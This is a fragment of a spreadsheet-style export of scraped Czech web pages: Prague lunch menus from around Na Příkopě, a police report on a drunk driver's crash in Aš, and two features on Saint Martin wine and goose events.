zázvor,citrón, grep) – 45 Kč Nám. Republiky 1090/5, Praha 1 Obědové menu se podává ve všední dny v čase od 11:30 do 15:00 hodin. Polévky: Batátový krém, zázvor, chilli strouhaný kokos – 125 Kč Předkrmy: Variace Makrely, černý česnek, marinované ředkvičky – 185 Kč Hlavní jídlo: Parmice pruhovaná, růžičková kapusta, čočka beluga, buerre rouge – 345 Kč Pečený daňčí hřbet, bylinková krusta, petrželový knedlík, dijonská omáčka – 345 Kč Na Příkopě 22, Praha 1 Speciální denní nabídka: ŠPANĚLSKÁ SUŠENÁ ŠUNKA – 750 Kč TATARÁK Z TUŇÁKA, LOSOSA A MOŘSKÉHO VLKA – 635 Kč SALÁT S TUŇÁKEM, BUVOLÍ MOZZARELLOU A RAJČATY – 510 Kč TATARÁK Z TUŇÁKA S BURATOU A PISTÁCIEMI – 635 Kč JAPONSKÉ POKE – TATARÁK Z TUŇÁKA, RÝŽE, VEJCE A WAKAME PLÁTKY SYROVÉHO TUŇÁKA, LOSOSA A MOŘSKÉHO VLKA S WAKAME A SALOU PONZU – 650 Kč KREVETY V JAPONSKÉ TEMPUŘE S PIKANTNÍ OMÁČKOU – 695 Kč GRILOVANÝ FILET ZE SVATÉHO PETRA S PEČENÝMI BRAMBORAMI A FAZOLEMI – 725 Kč MOŘSKÝ JAZYK NA MÁSLE A CITRONU PRO JEDNOHO S BRAMBOROVOU KAŠÍ SE ŠPENÁTEM – 795 Kč MOŘSKÝ JAZYK NA MÁSLE A CITRONU PRO DVA S BRAMBOROVOU KAŠÍ SE ŠPENÁTEM – 1680 Kč FILET Z DIVOKÉHO MOŘSKÉHO VLKA S KAPARY, CITRONOVOU ŠŤÁVOU A BRAMBOROVOU KAŠÍ – 725 Kč DOMÁCÍ TORTELLINI PLNĚNÉ ČERSTVÝM HŘIBEM V JEMNÉ PARMAZÁNOVÉ OMÁČCE – 495 Kč HOVĚZÍ LÍČKA „PIAMONTESE“ SE SOJOVOU OMÁČKOU A BRAMBOROVOU KAŠÍ – 650 Kč KOTLET Z IBERSKÉHO SELETE S HOŘČICOVOU SALSOU A HRANOLKAMI – 695 Kč BAŠU – HOTPOT Slovanský dům, Na Příkopě 859/22, Praha 1 Speciální denní nabídka: Přijďte si svůj oběd uvařit sami! Usadí vás ke speciálnímu stolu, který je zároveň indukční deskou. Naservírují vám hrnec s vroucím vývarem, ve kterém si postupně uvaříte, na co máte zrovna chuť – mořské plody, plátky masa, čerstvou zeleninu nebo houby. DHABA BEAS Slovanský dům Na Příkopě 22, Praha 1 Speciální denní nabídka: Bufetová nabídka vegetariánských a veganských jídel vycházející hlavně z tradiční indické, thajské, vietnamské a české kuchyně Cena vybraného jídla z bufetu je počítána dle váhy: 100g za 31,90 Kč. VAPIANO MYSLBEK Na Příkopě 21, Praha 1 Obědová nabídka se podává ve všední dny v čase od 11:00 do 14:00 hodin. Speciální obědová nabídka: Ovocný trh 12, Praha 1 Polévka: Shitake krémová polévka – 69 Kč Hlavní jídlo: Kuřecí katsudon s vejcem a rýži – 219 Kč Biang biang nudle s hovězím masem, čili a pak choi – 219 Kč Speciální nabídka: Ovocný trh 1096/8, Praha 1 Obědové menu se podává ve všední dny v čase od 11:00 do 15:00 hodin. Polévky: Kuřecí veluté, 0,3l – 55 Kč Hlavní jídlo: Vepřový guláš, houskový knedlík, 130g – 190 Kč Kuřecí játra na červeném víně, dušená rýže, 130g – 190 Kč Spaghetti carbonara, parmazán, 300g – 190 Kč 4ks kynuté lívance s rozvarem z lesního ovoce, 250g – 190 Kč Míchaný zeleninový salát s kuřecími stripsy, sweet mayo, toast, 300g – 235 Kč Menu: Kuřecí veluté, 0,3l &amp;amp; Pštrosí vejce, šťouchaný brambor, 180g – 235 Kč Nápoje k obědu: Coca cola , Coca cola zero, 0,2l – 45 Kč Birell, birell pomelo&amp;amp;grep, 0,3l – 39 Kč Čepovaná malinovka, 0,25l – 39 Kč Filtrovaná voda s citrusy, 0,45l – 39 Kč NOVÝ BONUS PROGRAM / 10+1 / – každý “ jedenáctý “ oběd do 200 Kč je ZDARMA! Rozhovor se spolumajitelem restaurace Na Čepu – Jiřím Mokrým . Obědové menu se podává ve všední dny v čase od 11:00 do 15:00 hodin. Polévka: Zuppa di pesce mediterranea – středomořská rybí polévka – 65 Kč Hlavní jídlo: Insalata toscana di pomodori con mozzarella, fagioli, basilico – toskánský rajčatový salát s mozzarellou, fazolky, bazalka – 179 Kč Risotto con barbabietole arrosto, formaggio di capra, spinaci, noci – rizoto s pečenou červenou řepou, kozí sýr, špenát, vlašské ořechy – 190 Kč Tagliatelle con tonno, pomodoro, uvetta, capperi, prezzemolo – tagliatelle s tuňákem, rajče, rozinky, kapary, petržel – 210 Kč Filetto di merluzzo, broccoli, carote, cavolo cinese, vellutata – svíčková z tresky, brokolice, karotka, bok choy, velouté – 385 Kč Pizza: Pizza Milano e Gorgonzola – rajčata San Marzano, Mozzarella Fior di Latte, sa SNĚMOVNA V JAKUBSKÝ Obědové menu se podává ve všední dny v čase od 11:00 do 15:00 hodin. Od 2.9.2024 bude z důvodu rekonstrukce OD KOTVA uzavřena letní zahrádka. RESTAURACE je nadále V PROVOZU. Polévka: Bramborová s houbami – 49 Kč Hlavní jídlo: Fish and chips z tresky, tatarská omáčka – 160 Kč Tortilla s trhaným kuřecím masem, zeleninou, sýrem čedar a uzenou majonézou, bramborové hranolky – 165 Kč Vepřová plec alá bažant, dušená basmati rýže – 160 Kč Medailonky z argentinského ball tipu, cibulové kroužky, sýrová brambora, BBQ omáčka – 235 Kč Biftečky z panenské svíčkové alá Djulbastia, bramborové hranolky – 225 Kč Tacos s trhaným vepřovým masem, zakysanou smetanou, nakládanou cibulkou a koriandrovou rýží – 225 Kč Okurkový, tomatový nebo mrkvový salátek – 49 Kč Cheesecake se slaným karamelem – 65 Kč Na Poříčí 48, Praha 1 Polední menu servírují formou denních specialit ve všední dny od 12:00 do 15:00 hod. Nabídka: Polévka z mořských plodů a rajčat Grilovaná holubí prsa, celerové pyré, kaštany CAFÉ IMPERIAL Na Poříčí 1072/15, Praha 1 Polévka: Fazolová polévka se slaninou – 85 Kč Předkrm: Terina z uzeného lososa s marinovanými okurky – 179 Kč Hlavní jídlo: Telecí saltimbocca s šafránovým rizotem – 299 Kč Pečený Tri tip s hříbkovou omáčkou, pečenou kořenovou zeleninou a bramborovou kroketou – 289 Kč Dančí plec na smetaně s žemlovým knedlíkem – 279 Kč LA REPUBLICA Na Poříčí 1041/12, Praha 1 Polévka: Česnečka s chlebovými krutóny – 40 Kč Hlavní jídlo: Zapečené těstoviny se sýrem feta a rajčaty – 119 Kč Grilované kuřecí paličky na medu s opečenými brambory – 119 Kč Vepřový steak s hranolkami a sázeným vejcem – 119 Kč Vepřová grilovaná žebra v BBQ omáčce s pečivem a česnekovým dipem – 299 Kč Nudličky z jeleního hřbetu na víně s domácími bramborovými kroketami – 299 Kč La Corte &amp;amp; Dvůr restaurant Na Poříčí 44, Praha 1 Polévka: Hlavní jídlo: Fusilli con pesce e panna – Telapie, česnek, petrželka, smetana, máslo, vývar, parmezán, polníček Risotto con carotine al miele e pomodorini – Medová mrkvička, cherry rajčata, tymián, máslo, parmezán, vývar, rukola Mix vepřového a kuřecího masa – na špízech se zeleninou, míchaným salátem, jogurtovo-citronovou omáčkou a americkými bramborami Pizza: Pizza con prosciutto Cotto e Funghi – Drcená rajčata, Mozzarella Fior Di Latte, prosciutto, šunka, žampiony, parmezán Pizza Verdure – Smetana, Mozzarella Fior Di Latte, středomořská zelenina, bazalka NEXT DOOR by IMPERIAL Krémová polévka z brambor s restovanými ryzci – 85 Kč Předkrm: Marinovaná telecí kýta s omáčkou z petržele a marinovanými lesními houbami – 195 Kč Hlavní jídlo: Filety z platýze ve vinném těstíčku s citronovou omáčkou a salátem s domácím dresinkem – 315 Kč Dušená hovězí líčka s bramborovou kaší, restovanou kořenovou zeleninou a omáčkou z červeného vína – 295 Kč Thajský zeleninový salát s hovězím masem – 285 Kč Krém z černého kořene – 57 Kč Hlavní jídlo: Mleté maso na špejli, tzatziki, pita, řecký salátek – 175 Kč Alpský povidlový knedlík, vanilkový krém, mák s cukrem – 175 Kč PASTA FRESCA Bazalkové gnocchi s rajčaty a sýrem stracciatella – 228 Kč Risotto s dýní, italskou klobásou a ricottou – 235 Kč Nízká roštěná s omáčkou z vína Chianti, růžičkovou kapustou a pečenými brambory – 378 Kč Polední menu je v nabídce ve všední dny od 11:00 do 15:00 hod. BRASSERIE THE JULIUS Senovážné náměstí 939/3, Praha 1 Obědové menu se podává ve všední dny v čase od 12:00 do 15:00 hodin. Polévka: Hovězí tatarák s kapary a dijonskou hořčicí, topinky z bílého chleba – 140 Kč Hlavní jídlo: Grilované kuřecí medailonky, omáčka z lesních hub, gratinované brambory se sýrem a smetanou, slanina – 280 Kč Hovězí nudličky Stroganov, žampióny, nakládaná okurka, dušená rýže, zakysaná smetana – 290 Kč Quesadilla plněná pastou z černých fazolí a sýrem čedar, trhaný salát, smažené hranolky, variace dipů, jalapeňos – 280 Kč Krémové italské rizoto s pórkem, grilované krevety, kousky pečených batátů s citrónovým olejem – 290 Kč Dvouchodové menu: Denní polévka a hlavní jídlo si vyberte dle vaší chuti – 315 Kč Dezerty: Pěna z krupicové kaše, kardamon, zelený čaj, kakao, Baileys – 140 Kč Citronový sorbet, lesní plody – 90 Kč Něco zdravého: Listový salát, čerstvá zelenina, domácí dresink – 210 Kč Extra losos – 110 Kč Hotel Andaz, Senovážné náměstí 976/32, Praha 1 Obědové menu se podává ve všední dny v čase od 12:00 do 15:00 hodin. Cena poledního menu: 1 CHOD – 365 Kč, 2 CHODY – 495 Kč, 3 CHODY – 565 Kč Předkrmy: LOSOSOVÝ TATARÁK – Nakládaná šalotka | creme fraîche | pažitka | chips z černého kořene CIZRNOVÉ PYRÉ – Nakládaný květák | granátové jablko | lískové ořechy MRKVOVÝ KRÉM – Pečená mrkev | nakládaný zázvor | zakysaná smetana Hlavní jídlo: HOVĚZÍ KROKETA – Dýňové pyré | nakládané švestky | karamelizované ořechy KRÁLÍČÍ HŘBET – Špenát | konfitovaný česnek | bramborové šišky SMAŽENÉ ŽAMPIONY – Konfitovaná brambora | tatarská omáčka | nakládaná kedlubna Dezert: RAKYTNÍKOVÉ CREME BRULEE – Švestkový kompot | lískovo-oříšková zmrzlina HOFFA BAR PRAHA Senovážné náměstí 22, Praha 1 Polévka: Špenátový krém, 4 dcl – 70 Kč Domácí hovězí vývar, 4 dcl – 70 Kč Polévka s hlavním chodem, 2 dcl – 30 Kč Hlavní jídlo: Vepřová quesadilla s domácím guacamole a zakysanou smetanou, 150g – 180 Kč Kuřecí řízek v bylinkové strouhance s bramborovou kaší s pečeným česnekem, 150g – 180 Kč Špagety aglio olio e peperoncino, 150g – 170 Kč Trhaný salát s grilovaným sýrem Halloumi, sušenými rajčaty a bagetkou, 150g – 170 Kč Dezert: Dezert dle denní nabídky – 60 Kč VINOGRAF SENOVÁŽNÉ NÁMĚSTÍ Senovážné náměstí 23, Praha 1 Polévka: Kroupová polévka s Pancettou a krutony – 85 Kč Malá jídla: Focaccia bruschetta, avokádo, rajčata, stracciatella – 175 Kč Hráškový hummus, avokádo, sušené olivy a petrželkový olej – 165 Kč Tygří krevety v panko strouhance, citron a petrželková majonéza – 185 Kč Burrata, pečená malá rajčata, bazalkové pesto s piniemi a křupavé krutony – 225 Kč Salát: Lososový gravlax, bramborový salát s cr?me fraîchee a koprem – 265 Kč Hlavní jídlo: Mletý vepřový řízek se sýrem, bramborová kaše, marinovaná zelenina – 225 Kč Kuřecí supreme, celerové pyré, glazé s houbami a lanýžovým olejem – 245 Kč Dýňové risotto, pečená dýně, dýňová semínka a stracciatella – 275 Kč Špagety s hovězí tagliatou, rajčaty a Grana Padano – 265 Kč Filet z pražmy, máslová zelenina, salsa verde – 395 Kč Dezert: Fasolada – Fazolová polévka – 49 Kč Hlavní jídlo: Fileto Kotopulo – Kuřecí prsní steak grilu s hranolkami a tzatziki – 179 Kč Keftadakia kokkinista – Kuličky z mletého hovězího masa v rajčatové omáčce a rýži – 179 Kč Briam – Pečený lilek, brambory, Cukety, mrkev, cibule a sýr feta, pita chléb – 179 Kč GYROS CHIRINOS – Vepřový gyros,pita, tzatziki, salátek – 189 Kč GYROS KOTOPULO – Kuřecí gyros, pita, tzatziki, salátek – 189 Kč Jindřišská ulice 940/22, Praha 1 Obědové menu se podává ve všední dny v čase od 11:00 do 14:00 hodin. Polévka: HOVĚZÍ VÝVAR S PRAŽENOU KRUPICÍ A VEJCEM – 59 Kč Hlavní jídlo: VEPŘOVÁ KÝTA NA SMETANĚ s brusinkami, domácí houskové knedlíky – 189 Kč KUŘECÍ ROLÁDA se šunkovou nádivkou, bramborová kaše, nakládaná zelenina – 189 Kč SPAGHETTI BOLOGNESE se sýrem Gran Biraghi – 179 Kč Speciální tip: PANENSKÁ SVÍČKOVÁ SE ŠVESTKOVOU OMÁČKOU, pečené americké brambory, zelenina na másle – 219 Kč ŠPEJLE – BISTRO a TAPAS BAR Jindřišská 937/16, Praha 1 Obědové menu se podává ve všední dny v čase od 11:00 do 15:00 hodin. Nabídněte si z našeho špejlového baru: Účtovat vám budou podle počtu nasbíraných špejlí 33 Kč / ks Masarykovo nádraží , Havlíčkova 1014/2, Praha 1 Obědové menu se podává ve všední dny v čase od 11:00 do 14:30 hodin. Polévka: Slovenská zelňačka s masem, klobásou, švestkami a houbami – 59 Kč Předkrm: Bramborák s uzeným masem a zelím – 165 Kč Penne s lososovou omáčkou – 169 Kč Kuřecí řízek v cornflakes, mačkaný brambor, salát coleslaw – 175 Kč Kuřecí Supreme se sýrovou omáčkou, bylinkovými grenaillemi, listový salát – 239 Kč FUZE PRAHA Na Florenci 2139/2, Praha 1 Obědové menu se podává ve všední dny v čase od 11:00 do 14:30 hodin. Polévka: Česnekový krém s krutony – 69 Kč Slepičí vývar se zeleninou Julienne a vaječnými nudlemi – 49 Kč Předkrm: Salát z pečené červené řepy, rukoly, fenyklu, strouhaným vejcem a vinným dresingem – 149 Kč Hlavní jídla: Sekaná s bramborovou kaší a kyselou kedlubnou – 169 Kč Vepřové trhané maso na bramborových šiškách s brokolicovým salátem a mákem – 169 Kč Hovězí valeček s koprovou omáčkou a houskovým knedlíkem – 179 Kč Speciality dne: Zelené curry s tofu, hráškem a jasmínovou rýží – 169 Kč Pečený hovězí krk se sezamem, jarní cibulkou a miso gnocchi – 245 Kč Poké s čerstvým lososem, rýží, guakamole, okurkou, kukuřicí, cibulkou a buráky – 255 Kč Dezert: Staročeský koláč trochu jinak – 49 Kč Nápoje k obědu: Sklenice vody, 02l – 35 Kč Domácí ledový čaj – jasmín, broskev, 0,2l – 49 Kč TransFUZE 12, 0,3/0,5l – 59 Kč / 69 Kč Filtrovaná voda, 0,75l – 89 Kč La Bottega Linka Vývar z grilovaného kuřete, podzimní zelenina, libečkové knedlíčky Hlavní jídlo: Florentinum , Na Florenci 15, Praha 1 Polévka: Bramborová krémová polévka s tymiánem, malá – 75 Kč Bramborová krémová polévka s tymiánem, velká – 105 Kč Hlavní jídlo: Pasta s grilovanou zeleninou, baby mozzarella, bazalka – 235 Kč Květák v sýrovém bešamelu, bazalka, sušené rajče, grenaille z pece – 235 Kč Salát s pečenou dýní, jablko, ořechy, grilovaný hermelín, dresink s javorovým sirupem, brusinky, rozpečená bagetka – 245 Kč GREENTABLE – GASTRO LOUNGE Florentinum , Na Florenci 15, Praha 1 Obědové menu se podává ve všední dny v čase od 11:00 do 14:45 hodin. Předkrm: Dýňový krém s křupavou kachní kroketou – 145 Kč Opečené foie gras s domácí brioškou, hruškovým tatarákem a omáčkou z portského vína – 365 Kč Hlavní jídlo: Pečená zelenina s houbovou omáčkou s nakládanými liškami a šafránovou kaší – 365 Kč Risotto s mušlí sv.Jakuba,smaženou krevetou a grilovanými kousky ryb – 565 Kč Grilovaná chobotnice s quinoa salsou, mrkvovo-cuketovým pyré a bylinkovou gremolátou – 765 Kč Hovězí svíčková U.S Prime s květákovým pyré, restovaným kadeřávkem, divokou brokolicí a omáčkou z červeného vína – 895 Kč Dezert: Obědové denní brunche se podávají ve všední dny v čase od 11:30 do 15:00 hodin. Denní Brunch: Omeleta | cuketa | sýr čedar – 190 Kč Vejce benedikt dle vlastního výběru | uzený losos | šunka serrano nebo pečený losos – 270 Kč Smažené vejce | pečený špenát | uzený losos – 220 Kč Avokádový chléb | fíky | sýr feta | cherry rajčata – 240 Kč Francouzský toast | ananas | vanilka | kešu – 260 Kč Domácí vafle | višně | nutella | šlehačka – 230 Kč Týdenní obědová nabídka: Politických vězňů 13, Praha 1 Obědové menu se podává ve všední dny v čase od 11:00 do 14:45 hodin. Hlavní jídlo: Kančí guláš s červeným vínem , houskové knedlíky nebo bramboráčky – 189 Kč Chilli con carne z hovězího masa s červenými fazolemi a sýrem, dušená rýže – 179 Kč Marinovaná vepřová žebra na thajský způsob, česneková sweet chilli omáčka, rozpečená bageta – 189 Kč Kuřecí steak obalený v bylinkách, cibulové brambory – 169 Kč Palác Koruna, Václavské náměstí 1, Praha 1 Obědové menu se podává ve všední dny v čase od 11:00 do 15:00 hodin. Polévka: Polévka Mien Ga – Domácí kuřecí vývar, kuřecí maso, zelenina, skleněné nudle, Jidáš. ucho, shiitake, jarní cibulka – 59 Kč Hlavní menu: M1: Golden Duck – Voňavá a křupavá kachna, sezónní salát, Hoisin omáčka, jasmínová rýže – 229 Kč M2: Curry Chicken – Pikantní thajské červené kari, kuřecí maso, zelenina, jasmínová rýže – 219 Kč M3: Bun Bo Nam Bo la lot – Restované hovězí na česnekovém másle, sezónní salát, rýžové nudle, speciální rybí omáčka, VN betelové závitky – 219 Kč M4: Chicken Poke Bowl – Kuřecí Karaage, kukuřice, edamame, mango, okurka, mrkev, koktejlová omáčka – 269 Kč M5: Tuna Kimbap – Tuňák, tenká omeleta, mrkev, nakládaná ředkev, okurka, krabí krém, sezam, sněhová a teriyaki omáčka – 269 Kč Nápoje: Birell, pomelo&amp;amp;grep, 0,3l – 39 Kč Pilsner Urquell, 12°, 0,3l – 39 Kč Coca – cola – 39 Kč Václavské nám . 779/16, Praha 1 Každý všední den připravujeme polední degustační menu mezi 11:00 a 14:00 hod. Denní menu: Nabídka je rozdělená do tří sekcí: studená, teplá a sladká. Můžete vybírat očima a podle nálady, na co zrovna budete mít chuť a co vás nejvíce zaujme. Jídelní lístek u nás nenajdete, zato bar plný českého tapasu servírovaný na malých talířkách. Talířky: Můžete si vybrat tapas ze tří velikosti talířků, které jsou v hodnotě 33 Kč a 66 Kč a 99 Kč. Hotel Alcron, Štěpánská 623/40, Praha 1 Předkrmy: Sýrová espuma – fíkové chutney – lískové ořechy – jalapeňo papričky – 165 Kč Kulajda – hříbky – křepelčí vejce – kopr – 145 Kč Hlavní jídlo: Pečená dýně – kozí sýr – sušená rajčata – kadeřávek – černý lanýž – 305 Kč Pstruh duhový – bílé zelí – květákové pyré – řapíkatý celer – ředkvičky – rybí velouté – 345 Kč Dančí kýta – pithivier – topinambur – kaštanové pyré – omáčka z červeného vína – 395 Kč Hovězí nízký roštěnec – bramborová kaše – divoká brokolice – demi glace – 520 Kč Dezert: Financier, švestky, ganache – 145 Kč Rumová zmrzlina, 1 kopeček – 70 Kč Navíc můžete využít i nabídku A LA CARTE v odkazu ZDE KAVÁRNA BÍLÁ VRÁNA Ve Smečkách 604/5, Praha 1 Sociálně prospěšný podnik při organizaci POHODA, z.ú. ve kterém pracuji lidé s mentálním postižením. P Á T E K – Z A V Ř E N O LA CASA TRATTORIA V Jámě 8, Praha 1 Polévka: Brokolicový krém s krutony – 49 Kč Hlavní jídlo: Cézar salát s grilovanými tygří krevetami – 169 Kč Penne s kalamáry, pečenými lilky, kapary a sušenými rajčátky – 179 Kč Krůtí prsíčka na kari, zelené fazolky s česnekem a paprikami, dýňové pyré – 189 Kč Obědové menu se podává ve všední dny v čase od 11:00 do 14:00 hodin. Polévky: Hráškový krém s krutony a mátou – 60 Kč Saláty &amp;amp; Těstoviny: Spaghetti s tomatovou omáčkou, cuketou, mozzarellou a parmazánem – 160 Kč Trhané listové saláty s pečenou červenou řepou a modrým sýrem – 160 Kč Hlavní jídlo: Zapečené brambory se šunkou od kosti a uzeným sýrem – 99 Kč Pečená vinná klobása s bramborovou kaš í a okurkovým salátkem – 149 Kč 1/4 Grilované kuřátko z našeho Pipi Grilu, pečené Grenaille a malý salát Coleslaw – 170 Kč Tortilla wrap s trhaným kuřecím masem, nachos chips a cheddarovou omáčkou – 170 Kč BBQ Texas vepřový steak s hranolkami – 180 Kč Hovězí pečeně po pražsku, dušená rýže – 180 Kč Filátko z candáta s restovanou zeleninou a bramborami Grenaille – 180 Kč Dezert: Dezert dle denní nabídky – 69 Kč Nápoje: Prémiový ležák Krušovice Bohém, 0,4l – 49 Kč GARDEN´S RESTAURANT Dýňový krém s citronovou trávou a limetovými listy, kokosová espuma – 155 Kč Předkrmy: Hovězí carpaccio, olivy taggiasche, parmezán, rukola, pečivo – 355 Kč Čerstvé ústřice Fine de Claire No. 2 ( Normandie ), omáčka Mignonette, podáváme na ledu s citronem – 1 ks | 105 Kč Tatarák z jeleního hřbetu, lanýž, citrónová kůra, parmezán, pečivo – 365 Kč Hlavní jídlo: Domácí pappardelle s hovězí svíčkovou, hříbková omáčka s estragonem, cherry rajčata, baby špenát, parmezán – 485 Kč 3 chodové menu – 735 Kč Rolovaný králičí hřbet s olivami a sušenými rajčaty, hráškové pyré, černý kořen, hrášek, tymiánový demi – glace – 545 Kč 3 chodové menu – 795 Kč Jungmannovo náměstí 763/3, Praha 1 Obědové menu se podává ve všední dny v čase od 11:00 do 15:00 hodin. Polévka: HOVĚZÍ GULÁŠ – bramboráčky – 199 Kč SMAŽENÁ TRESKA – vařené brambory, tatarská omáčka – 199 Kč VEPŘOVÉ UZENÉ – čočka, kyselá okurka – 199 Kč ZELENINOVÝ SALÁT – zelenina, salátové listy, kuřecí maso – 189 Kč Hrachová polévka s uzeným masem, chlebové krutóny, 0,25l – 59 Kč Jemný krém z kokosových fazolí, smažené kukuřičné nudle, česnekový chilli olej, 0,4l – 99 Kč Velký hovězí vývar s játrovým knedlíkem a zeleninou, 0,4l – 79 Kč Hlavní jídlo: Hovězí kostky na debrecínský způsob, dušená rýže basmati, 150g – 179 Kč Vepřové výpečky, moravské dušené zelí, houskové knedlíky, 150g – 179 Kč Smažený kuřecí řízek v sýrové krustě, bramborová kaše, marinované cibulky, 350g – 199 Kč Koprová omáčka se ztracenými vejci, vařené brambory, 350g – 169 Kč SPECIALITA – pikantní krůtí nudličky se žampióny a zeleninou, domácí bramboráčky, 150g – 229 Kč Čerstvé vaječné těstoviny Carbonara (s italskou pancettou, česnekem, žloutky a parmazánem), 350g – 219 Kč NEJVÍCE ŽÁDANÉ – VELKÝ HOVĚZÍ GULÁŠ, karlovarské knedlíky, 200g – 269 Kč NEJVÍCE ŽÁDANÉ – SVÍČKOVÁ PEČENĚ NA SMETANĚ, houskové knedlíky, brusinky, 200g – 269 Kč NEJVÍCE ŽÁDANÉ – SMAŽENÉ KRŮTÍ ŘÍZEČKY V SEZAMOVÉ STROUHANCE, vídeňský bramborový salát, polníček, 180g – 269 Kč KOZLOVNA U PAUKERTA Česnečka s uzenou krkovicí, chlebové krutony – 50 Kč Hlavní jídlo: Maďarský hovězí guláš s houskovými knedlíky – 195 Kč Živáňská pečeně (vepřová plec, kuřecí maso, klobása, brambory, zelenina), dip ze zakysané smetany – 194 Kč Smažené kuřecí řízečky s bramborovou kaší, malý okurkový salát – 188 Kč Zapečené těstoviny s uzenou krkovicí, kyselá okurka – 179 Kč RESTAURACE TISKÁRNA – NÁRODNÍ Obědové menu se podává ve všední dny v čase od 11:00 do 14:00 hodin. Polévka: HOVĚZÍ VÝVAR S PRAŽENOU KRUPICÍ A VEJCEM – 59 Kč Hlavní jídlo: VEPŘOVÁ KÝTA NA SMETANĚ s brusinkami, domácí houskové knedlíky – 189 Kč KUŘECÍ ROLÁDA se šunkovou nádivkou, bramborová kaše, nakládaná zelenina – 189 Kč PALAČINKY PLNĚNÉ ŠPENÁTEM, ricottou a parmazánem v rajčatové omáčce – 179 Kč Speciální tip: Obědová nabídka se podává ve všední dny v čase od 11:00 do 14:00 hodin. Speciální obědová nabídka: TĚSTOVINY PESTO BASILICO – 175 Kč Polední menu na Pražských Příkopech podporuje: Portál o hotelech, pensionech a spa resortech. Nevyjímaje restaurace, loby, bary, kavárny a vinárny. Naleznete zde i tipy na golfová hřiště a resorty, fitness, sportoviště, bazény a koupaliště. Navigace pro příspěvek 20. 2. 2024 Mikolášek (šéfredaktor HMG) Komentáře nejsou povolené u textu s názvem Polední menu v lokalitě Pražské Příkopy najdete každý všední den u nás na portálu Na portálu projektu PražskéPříkopy.cz najdete od letošního února každý všední den to nejobsáhlejší polední menu v... 9. 2. 2024 Miroslav Vaněk Komentáře nejsou povolené u textu s názvem POLEDNÍ MENU – Pátek 9.2.: Kde se dnes na Příkopech můžete dobře najíst? Poradíme s výběrem! Dobře se najíst v centru Prahy na Pražských Příkopech je hračka, stačí si jen dobře vybrat…... 8. 2. 2024 Miroslav Vaněk Komentáře nejsou povolené u textu s názvem POLEDNÍ MENU – Čtvrtek 8.2.: Kde se dnes na Příkopech můžete dobře najíst? Poradíme s výběrem! Dobře se najíst v centru Prahy na Pražských Příkopech je hračka, stačí si jen dobře vybrat…... *** PRAŽSKÉ PŘÍKOPY *** Největší a nejdelší nákupní lokalita v centru Prahy *** PRAŽSKÉ PŘÍKOPY *** Největší a nejdelší nákupní lokalita v centru Prahy *** Pražšké Příkopy: Autor: Mikolášek (šéfredaktor HMG)</t>
  </si>
  <si>
    <t>43</t>
  </si>
  <si>
    <t>20241101_583_3240406509_83a687ffdf1da2363a86.html</t>
  </si>
  <si>
    <t>83a687ffdf1da2363a86</t>
  </si>
  <si>
    <t>Podnapilý řidič audi naboural v Aši do zaparkovaných aut</t>
  </si>
  <si>
    <t>Podnapilý řidič audi naboural v Aši do zaparkovaných aut Foto: Policie ČR Karlovarský kraj V neděli 13. října letošního roku krátce po páté hodině ranní došlo v Aši na Chebsku k dopravní nehodě osobního automobilu. K té mělo dojít tak, že třiadvacetiletý řidič osobního vozidla značky Audi jedoucí ulicí Okružní ve směru z ulice Selbská zřejmě nepřizpůsobil rychlost a narazil vpravo do zadní části zaparkovaného vozidla značky Peugeot . To bylo vlivem nárazu odraženo do dalšího zaparkovaného osobního automobilu značky Ford. Policisté u řidiče po dopravní nehodě provedli orientační dechovou zkoušku na přítomnost alkoholu , která vyšla s pozitivním výsledkem 1,47 promile. Muži byl na místě zadržen řidičský průkaz a byla mu zakázána další jízda. Svým jednáním způsobil škodu přibližně 300 tisíc korun. Chebští dopravní policisté sdělili podezření ze spáchání přečinu ohrožení pod vlivem návykové látky třiadvacetiletému muži z Chebska . V případě prokázání viny mu tak hrozí trest odnětí svobody až na tři roky. nprap. Jan Bílek Policie ČR Autor: Pavel Jaňurek Autor person Pavel Jaňurek Rubrika transition_slide Události</t>
  </si>
  <si>
    <t>20241101_584_3335191677_01e1c3bf961a33fdb341.html</t>
  </si>
  <si>
    <t>01e1c3bf961a33fdb341</t>
  </si>
  <si>
    <t>Svatý Martin v Šaldorfských sklepech</t>
  </si>
  <si>
    <t>Svatý Martin v Šaldorfských sklepech 0 z 5 fotografie Tradiční oslava mladých vín vinařů z Nového Šaldorfa, která se koná vždy v sobotu, která je nejblíže ke svátku sv. Martina. Odpoledne probíhá u historického kládového lisu na prostranství mezi sklepy setkání s vinaři, kde se připomínají martinské tradice – děti z místní mateřské školy zpívají písně o sv. Martinovi , přijíždí sv. Martin na koni a farář žehná mladým vínům. Poté se otevřou návštěvníkům místní vinné sklepy, kde je možné až do večera ochutnávat (nejen) mladá vína , a to jak čistá tak i kalná, anebo zakousnout martinské koláčky či jiné občerstvení. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_585_3360127751_8e28e8aed45b88fa5dac.html</t>
  </si>
  <si>
    <t>8e28e8aed45b88fa5dac</t>
  </si>
  <si>
    <t>Husí speciality U Tesařů</t>
  </si>
  <si>
    <t>Husí speciality U Tesařů fotografie Vyhlášená rodinná restaurace U Tesařů v centru Bítova pořádá v průběhu celého roku řadu speciálních gurmánských akcí, které jsou vždy doplněny také orosenou produkcí ze sousedního “sesterského” Hasičského pivovaru Bítov. V listopadu se těšte na Husí hody, které kromě řemeslného piva Tesák doplňuje i mladé víno z Vinařství Líbal. Gastronomická událost je tradičně spojená s listopadovým svátkem sv. Martina (11. 11.) a U Tesařů trvá vždy po celý týden. Reklama Svatomartinské 3chodové menu zahrnuje polévku: husí vývar s knedlíčky a droby; hlavní chod: 1/4 pečené husy s bílým i červeným zelím a houskovým i bramborovým knedlíkem; a k tomu makový Martinský rohlíček jako dezert. Využít však můžete i možnost ubytování ve zdejším rodinném Penzionu U Tesařů a speciální Svatomartinský pobytový balíček. Ten zahrnuje jak ubytování na 2 noci, tak kompletní Svatomartinské menu, ochutnávku mladých vín i komentovanou prohlídku Hasičského pivovaru Bítov s degustací. http://www.utesaru.cz https://www.facebook.com/profile.php?id=100063820710019 Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_586_3264557424_45b6a798630693a1d5bd.html</t>
  </si>
  <si>
    <t>45b6a798630693a1d5bd</t>
  </si>
  <si>
    <t>Sv. Martin v Dyjákovicích</t>
  </si>
  <si>
